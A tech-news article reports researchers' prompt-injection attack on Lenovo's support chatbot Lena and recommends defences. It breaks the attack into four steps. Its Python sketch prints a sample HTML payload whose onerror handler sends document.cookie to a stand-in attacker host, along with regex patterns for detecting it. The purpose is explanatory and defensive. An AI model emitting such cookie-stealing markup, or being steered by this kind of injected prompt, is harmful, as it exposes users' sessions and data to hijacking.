Lenovo has become the latest major brand to face scrutiny after researchers uncovered a serious security vulnerability in its AI-powered customer service chatbot.
Cybernews security experts recently tested Lena, Lenovo’s ChatGPT-driven support assistant, and the results were alarming. Their investigation revealed that the chatbot could be manipulated into exposing sensitive company information.
The researchers discovered a flaw that allowed them to hijack live session cookies from customer support agents. With those stolen cookies, attackers could bypass login requirements, infiltrate live chats, and even review previous conversations and stored data. Shockingly, this exploit required only a single 400-character prompt.
During the investigation, Cybernews highlighted how easily AI chatbots can be tricked:
“Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new.
“What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”
Breaking Down the Flaw
Although Cybernews uncovered the vulnerability, there is no indication that hackers actually accessed customer data. Once the flaw was reported, Lenovo confirmed the issue and acted swiftly to secure its systems.
So how did the researchers fool Lena? Their crafted prompt contained four critical components:
- Innocent opener – The attack started with a normal product query, such as asking for Lenovo IdeaPad specifications.
- Hidden format switch – Next, the prompt steered the chatbot into responding in HTML (alongside JSON and plain text), formats the server is programmed to process.
- The payload – Embedded in the HTML was a fake image link. When the browser tried to load the image, it sent a request to the attacker’s server, exposing session cookies.
- The push – Finally, the attacker framed the image as essential to the buying decision, forcing the bot to display it.
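To make the mechanism above concrete, here is a minimal sketch of the style of payload described and a coarse server-side check that would flag it. The attacker domain, attribute names, and detection patterns are invented for illustration; this is not the actual prompt or payload Cybernews used.

```python
import re

# Hypothetical reconstruction of the payload style described above;
# the domain "attacker.example" and the exfiltration endpoint are invented.
malicious_html = (
    '<img src="https://attacker.example/x.png" '
    "onerror=\"fetch('https://attacker.example/c?d='+document.cookie)\">"
)

def looks_like_exfiltration(html_out: str) -> bool:
    """Flag chatbot output containing inline event handlers, script tags,
    or references to document.cookie -- a coarse, illustrative check only."""
    patterns = [r"on\w+\s*=", r"document\.cookie", r"<script"]
    return any(re.search(p, html_out, re.IGNORECASE) for p in patterns)

print(looks_like_exfiltration(malicious_html))             # True
print(looks_like_exfiltration("<p>IdeaPad specs...</p>"))  # False
```

A real deployment would pair detection like this with outright sanitization rather than relying on pattern matching alone, since attackers can obfuscate markup in ways simple regexes miss.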
This method mirrors broader security concerns across the AI landscape. Zenity, for example, recently reported that over 3,500 public-facing AI agents remain vulnerable to similar prompt injection tactics.
Why Businesses Should Take Note
Lenovo’s chatbot flaw serves as a strong reminder for any organization relying on AI in customer service. The issue goes beyond a single mistake; it highlights how AI systems, designed to please, can be manipulated when not properly safeguarded.
Moreover, Lenovo isn’t alone. Other high-profile brands have faced similar challenges. New York City’s “MyCity” assistant once provided misleading and even illegal advice. Air Canada was taken to court after its chatbot misinformed a customer, with the ruling forcing the airline to honor the incorrect guidance. Even DPD’s chatbot ended up generating offensive content and mocking its own company.
These incidents reveal a consistent pattern: AI chatbots are prone to errors, hallucinations, and vulnerabilities. The key question for businesses is not whether an AI system will make mistakes, but how effectively they can detect and contain them.
Strengthening Chatbot Security
While AI evolves too rapidly for a one-size-fits-all playbook, companies can follow several best practices to reduce risks:
- Harden input and output checks: Always sanitize user queries and bot responses, and block unverified code execution. This step alone could have prevented Lena’s cookie vulnerability.
- Verify outputs before execution: Servers should never blindly trust chatbot responses as actionable instructions.
- Restrict session privileges: Limit chatbot access levels to reduce damage if tokens or cookies are compromised.
- Continuously monitor systems: Spotting unusual activity early can stop a minor issue from becoming a major breach.
- Test aggressively and regularly: Simulate prompt-injection and other AI-focused attacks to identify weaknesses before real attackers do.
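The first practice, hardening output checks, can be sketched as an escape-then-allow-list pass over chatbot output before it is rendered. This is a minimal illustration using only the standard library; the allow-list is hypothetical, and production systems should use a maintained HTML-sanitizing library instead of hand-rolled string replacement.

```python
import html

# Hypothetical allow-list of harmless formatting tags.
ALLOWED_TAGS = {"b", "i", "p", "ul", "li"}

def sanitize_bot_output(raw: str) -> str:
    """Escape all markup in the bot's response, then re-enable a small
    set of harmless tags. Anything else (img, script, event handlers)
    is rendered as inert text, so the browser never requests it."""
    escaped = html.escape(raw)
    for tag in ALLOWED_TAGS:
        escaped = escaped.replace(f"&lt;{tag}&gt;", f"<{tag}>")
        escaped = escaped.replace(f"&lt;/{tag}&gt;", f"</{tag}>")
    return escaped

out = sanitize_bot_output('<p>Specs</p><img src="https://evil.example/a">')
# The <p> tag survives; the <img> tag is escaped into plain text.
```

Applied to Lena, a pass like this would have neutralized the fake image link: the browser would display the markup as text rather than firing a request to the attacker’s server.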
Final Takeaway
AI chatbots like Lena promise efficiency and improved customer experiences, but they also carry significant risks if left unchecked. Lenovo’s case proves that even global brands can overlook fundamental safeguards. In today’s digital environment, where small oversights can escalate rapidly, pairing AI tools with rigorous security measures is no longer optional—it’s essential.
To join our expert panel discussions, reach out to sudipto@intentamplify.com